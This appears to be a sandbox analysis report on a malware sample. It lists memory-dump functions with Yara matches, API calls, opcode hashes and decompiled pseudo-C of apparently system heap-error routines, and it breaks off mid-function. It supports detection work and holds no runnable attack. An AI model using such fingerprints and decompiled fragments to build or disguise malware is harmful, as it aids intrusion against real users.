                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 429b82906f7c715e26da7c6de94c4f816a77b99317e3adb34f896f6ea63db8aa
                                                                                        • Instruction ID: adb45baeeae621ea587358a16d62a6366ee15af0e37e1e183d6d59425c7e0909
                                                                                        • Opcode Fuzzy Hash: 429b82906f7c715e26da7c6de94c4f816a77b99317e3adb34f896f6ea63db8aa
                                                                                        • Instruction Fuzzy Hash: 7D9002A5211011030605A5590714547054697D6391361C431F1015550CD66188A1B1A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0868fae3ed9427795ff8b44aa54f6c603fd8452e0b2623a909cc4da65b143057
                                                                                        • Instruction ID: 5eba81ff277a71817f070fb13c6599f7366eca574c5fe557f20ce1084cc89b65
                                                                                        • Opcode Fuzzy Hash: 0868fae3ed9427795ff8b44aa54f6c603fd8452e0b2623a909cc4da65b143057
                                                                                        • Instruction Fuzzy Hash: 0D9002B120109902D6106159841478A050597D1341F65C821A4424658D86D588D1B1A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2801e6e7bf1316f72901d06e16ea33192e813962f46dd78c5ac2281c7ed1794b
                                                                                        • Instruction ID: 568be3105d73332c2dfaddb7ff7369dbde018f0a11d5832ada06ce33900af7e2
                                                                                        • Opcode Fuzzy Hash: 2801e6e7bf1316f72901d06e16ea33192e813962f46dd78c5ac2281c7ed1794b
                                                                                        • Instruction Fuzzy Hash: B69002B120101902D6807159441468A050597D2341FA1C425A0025654DCA558A99B7E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 662a45175c052410fc507a114d39aabb688b24b0c10e9ff131318fc517832844
                                                                                        • Instruction ID: 46471ac3caa5128a92f3e46de14373f2dd0fa750734e40e790a9d3e3b0f4b6cd
                                                                                        • Opcode Fuzzy Hash: 662a45175c052410fc507a114d39aabb688b24b0c10e9ff131318fc517832844
                                                                                        • Instruction Fuzzy Hash: 109002A921301102D6807159541864A050597D2342FA1D825A0015558CC95588A9B3A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d5c6c304e96c93c75f1e019954a6bdc517c8da3559e3a64f354592a2e131de93
                                                                                        • Instruction ID: 8a13c81c0b5251a5a8f535c3e44b8830f7778e7a298c07849f2b819d79c5c95a
                                                                                        • Opcode Fuzzy Hash: d5c6c304e96c93c75f1e019954a6bdc517c8da3559e3a64f354592a2e131de93
                                                                                        • Instruction Fuzzy Hash: 9C9002A130101103D640715954286464505E7E2341F61D421E0414554CD9558896B2A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e595a3e7d130d2f0e60fffe170d455c4d41bc743e54a3b1b90a39b69ed7ef341
                                                                                        • Instruction ID: f9a4903ae2c13131827fa54cbef76fb5068bb97cbf910b0e1101343a77217c29
                                                                                        • Opcode Fuzzy Hash: e595a3e7d130d2f0e60fffe170d455c4d41bc743e54a3b1b90a39b69ed7ef341
                                                                                        • Instruction Fuzzy Hash: EA9002B120101502D60065995418686050597E1341F61D421A5024555EC6A588D1B1B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                                                                        • Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
                                                                                        • Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                                                                        • Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 60threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 315c131c52cd8966b25a2e40913586ab669ebcf80d8045c26bb194d5de1872be
                                                                                        • Instruction ID: b843052e0d9e159803d86304df93de21b4dec75b1cda2e6ecc30d80e928dd9a6
                                                                                        • Opcode Fuzzy Hash: 315c131c52cd8966b25a2e40913586ab669ebcf80d8045c26bb194d5de1872be
                                                                                        • Instruction Fuzzy Hash: 3301D631A803287BE720A6A59C42FEE761C6B81B54F05411EFA04BA1C1E6E9691947EA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A345, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 5f2d9f4bf5e4792bdb1c4e92612e6bfd4f173dda06e869e6b9f2df1f261d9fa1
                                                                                        • Instruction ID: b7e96bb0d499f1e0c673aa08fdb1000c52253c7d581712575878348a7346817d
                                                                                        • Opcode Fuzzy Hash: 5f2d9f4bf5e4792bdb1c4e92612e6bfd4f173dda06e869e6b9f2df1f261d9fa1
                                                                                        • Instruction Fuzzy Hash: 860139B5210208BBDB14DF99DC45EEB37A9AF88314F018159FE08A7641C634A8118BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                                                                        • Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
                                                                                        • Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                                                                        • Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                        • Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                        • Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                        • Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                        • Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                        • Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                        • Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A272, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: 5c271a3c2ec116ddc4725de93b30a9d339bea5c241599cbceea725329ccbcfea
                                                                                        • Instruction ID: b4333775077665aee35658198a1ff0306aeecfa0b6fea6474a08ed006f850bf6
                                                                                        • Opcode Fuzzy Hash: 5c271a3c2ec116ddc4725de93b30a9d339bea5c241599cbceea725329ccbcfea
                                                                                        • Instruction Fuzzy Hash: 77E08C346102047BC320DB68DC8AFD33BB99F48754F048568BA586B242D630EA01CBE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                        • Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                        • Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 8650c6ee39c9e4ed8e29731edbeed9cea692ccf88a9469733d53cde90205a4a7
                                                                                        • Instruction ID: 4816e34c42bbc123c1eee8446dbb9f682c2735ebb52ff03dba66a34253ac5bba
                                                                                        • Opcode Fuzzy Hash: 8650c6ee39c9e4ed8e29731edbeed9cea692ccf88a9469733d53cde90205a4a7
                                                                                        • Instruction Fuzzy Hash: B8B092B29024D6CAEB51E7A04A08B2B7E10BBE1741F26C562E2130685B4779C5D1F6F6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00C7B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • *** then kb to get the faulting stack, xrefs: 00C7B51C
                                                                                        • The critical section is owned by thread %p., xrefs: 00C7B3B9
                                                                                        • The instruction at %p tried to %s , xrefs: 00C7B4B6
                                                                                        • Go determine why that thread has not released the critical section., xrefs: 00C7B3C5
                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00C7B314
                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00C7B476
                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00C7B484
                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 00C7B48F
                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 00C7B352
                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00C7B39B
                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00C7B305
                                                                                        • <unknown>, xrefs: 00C7B27E, 00C7B2D1, 00C7B350, 00C7B399, 00C7B417, 00C7B48E
                                                                                        • *** Inpage error in %ws:%s, xrefs: 00C7B418
                                                                                        • a NULL pointer, xrefs: 00C7B4E0
                                                                                        • This failed because of error %Ix., xrefs: 00C7B446
                                                                                        • *** enter .exr %p for the exception record, xrefs: 00C7B4F1
                                                                                        • The resource is owned shared by %d threads, xrefs: 00C7B37E
                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00C7B2F3
                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00C7B323
                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00C7B47D
                                                                                        • read from, xrefs: 00C7B4AD, 00C7B4B2
                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00C7B53F
                                                                                        • an invalid address, %p, xrefs: 00C7B4CF
                                                                                        • *** enter .cxr %p for the context, xrefs: 00C7B50D
                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00C7B2DC
                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00C7B38F
                                                                                        • The resource is owned exclusively by thread %p, xrefs: 00C7B374
                                                                                        • The instruction at %p referenced memory at %p., xrefs: 00C7B432
                                                                                        • write to, xrefs: 00C7B4A6
                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00C7B3D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                        • API String ID: 0-108210295
                                                                                        • Opcode ID: d21c4dfaa0b6749ee7f6eab35c619316d46510e53b8eb82b5be9e25af8b1b8e2
                                                                                        • Instruction ID: 2f108ca3b2a6194f9dc5f8c484796ebf4c1d7259cbba84aca3e6a1c718baac3c
                                                                                        • Opcode Fuzzy Hash: d21c4dfaa0b6749ee7f6eab35c619316d46510e53b8eb82b5be9e25af8b1b8e2
                                                                                        • Instruction Fuzzy Hash: E081F639A00200FFCB255A058C56EBB3F65EF4AB92F418094F5092B163E7B59D91E772
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C81C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 44%
                                                                                        			E00C81C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xba48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00BCB150();
				} else {
					E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xcb589c);
				E00BCB150("Heap error detected at %p (heap handle %p)\n",  *0xcb58a0);
				_t27 =  *0xcb5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00C81E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00BCB150();
				} else {
					E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00BCB150("Error code: %d - %s\n",  *0xcb5898);
				_t113 =  *0xcb58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00BCB150("Parameter1: %p\n",  *0xcb58a4);
				}
				_t115 =  *0xcb58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00BCB150("Parameter2: %p\n",  *0xcb58a8);
				}
				_t117 =  *0xcb58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00BCB150("Parameter3: %p\n",  *0xcb58ac);
				}
				_t119 =  *0xcb58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xcb58b4);
					E00BCB150("Last known valid blocks: before - %p, after - %p\n",  *0xcb58b0);
				} else {
					_t120 =  *0xcb58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00BCB150();
				} else {
					E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00BCB150("Stack trace available at %p\n", 0xcb58c0);
			}











                                                                                        0x00c81c10
                                                                                        0x00c81c16
                                                                                        0x00c81c1e
                                                                                        0x00c81c3d
                                                                                        0x00c81c3e
                                                                                        0x00c81c20
                                                                                        0x00c81c35
                                                                                        0x00c81c3a
                                                                                        0x00c81c44
                                                                                        0x00c81c55
                                                                                        0x00c81c5a
                                                                                        0x00c81c65
                                                                                        0x00c81c67
                                                                                        0x00000000
                                                                                        0x00c81c6e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c81c67
                                                                                        0x00c81cdc
                                                                                        0x00c81ce5
                                                                                        0x00c81d04
                                                                                        0x00c81d05
                                                                                        0x00c81ce7
                                                                                        0x00c81cfc
                                                                                        0x00c81d01
                                                                                        0x00c81d0b
                                                                                        0x00c81d17
                                                                                        0x00c81d1f
                                                                                        0x00c81d25
                                                                                        0x00c81d30
                                                                                        0x00c81d4f
                                                                                        0x00c81d50
                                                                                        0x00c81d32
                                                                                        0x00c81d47
                                                                                        0x00c81d4c
                                                                                        0x00c81d61
                                                                                        0x00c81d67
                                                                                        0x00c81d68
                                                                                        0x00c81d6e
                                                                                        0x00c81d79
                                                                                        0x00c81d98
                                                                                        0x00c81d99
                                                                                        0x00c81d7b
                                                                                        0x00c81d90
                                                                                        0x00c81d95
                                                                                        0x00c81daa
                                                                                        0x00c81db0
                                                                                        0x00c81db1
                                                                                        0x00c81db7
                                                                                        0x00c81dc2
                                                                                        0x00c81de1
                                                                                        0x00c81de2
                                                                                        0x00c81dc4
                                                                                        0x00c81dd9
                                                                                        0x00c81dde
                                                                                        0x00c81df3
                                                                                        0x00c81df9
                                                                                        0x00c81dfa
                                                                                        0x00c81e00
                                                                                        0x00c81e0a
                                                                                        0x00c81e13
                                                                                        0x00c81e32
                                                                                        0x00c81e33
                                                                                        0x00c81e15
                                                                                        0x00c81e2a
                                                                                        0x00c81e2f
                                                                                        0x00c81e39
                                                                                        0x00c81e4a
                                                                                        0x00c81e02
                                                                                        0x00c81e02
                                                                                        0x00c81e08
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c81e08
                                                                                        0x00c81e5b
                                                                                        0x00c81e7a
                                                                                        0x00c81e7b
                                                                                        0x00c81e5d
                                                                                        0x00c81e72
                                                                                        0x00c81e77
                                                                                        0x00c81e95

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                        • API String ID: 0-2897834094
                                                                                        • Opcode ID: cc90986b5bf8cb6b5a00b1c1ae75761d5ecb9017437e39bfb7250ab1a85b40fd
                                                                                        • Instruction ID: 36af43cd591242932e331f6087d3e5c2d5e7b787c23f1db3664f2d64e3e21e44
                                                                                        • Opcode Fuzzy Hash: cc90986b5bf8cb6b5a00b1c1ae75761d5ecb9017437e39bfb7250ab1a85b40fd
                                                                                        • Instruction Fuzzy Hash: 2561C0375A4550DFC311AB85D896F7873ECEB04B25F1D80BAFC1A6B362C6659C428B0D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C84AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 59%
                                                                                        			E00C84AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
